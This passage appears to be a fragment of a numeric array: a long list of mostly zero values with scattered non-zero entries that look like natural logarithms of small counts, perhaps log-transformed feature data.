0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 6.238324625039507, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 2.5649493574615367, 3.8918202981106265, 0.0, \n 0.0, 2.6390573296152584, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 6.731743096669168, 0.0, 0.0, 0.0, 0, 0, 0.0, 3.6635616461296467, 0, 0.0,\n 0, 2.9444389791664403, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, \n 3.258096538021482, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 2.8903717578961645, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 4.890349128221754, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0,\n 3.4825185607408002, 0.0, 2.1972245773362196, 0.0, 0, 0, \n 2.0794415416798357, 5.8888779583328805, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 5.8066078281957605, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.8903717578961645, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, \n 4.0943445622221, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 3.4339872044851467, 0, 0, 1.7412592803704001, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 3.784189633918261, 0, 0.0, 7.454719949364001, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.897839799950911, 0.0, 0, 0, 0.0, 0.0, 0,\n 0, 2.1972245773362196, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, \n 3.649511027115099, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0, 0, 0.0, 0, 0, 0.0, \n 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 2.550898738446989, 0, 0, 4.160336650881089, 1.3862943611198906, 0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 1.791759469228055, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, \n 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, \n 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 3.4011973816621555, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 4.1588830833596715, 1.791759469228055, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 2.9444389791664403, 0, 0, 0.0, 0.0, 0, \n 4.1588830833596715, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 2.302585092994046, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.825453896395788, 0, 1.3862943611198906, 1.6094379124341003, 0, \n 1.6094379124341003, 6.778355426745129, 0, 0, 0.0, 0.0, \n 2.4849066497880004, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, \n 1.9459101490553132, 1.9459101490553132, 0, 0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.9459101490553132, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 2.772588722239781, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.1588830833596715, 0.0, 0.0, 0, 3.2958368660043296, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.4849066497880004, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253877, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 2.0794415416798357, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.4825185607408002,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 2.6390573296152584, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 2.0794415416798357, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 3.8005740880419454, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 1.0986122886681098, 0, 0.0, 0.0, 3.2958368660043296, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 4.110873864173311, 0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.969813299576001, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 2.1972245773362196,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.302585092994046, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 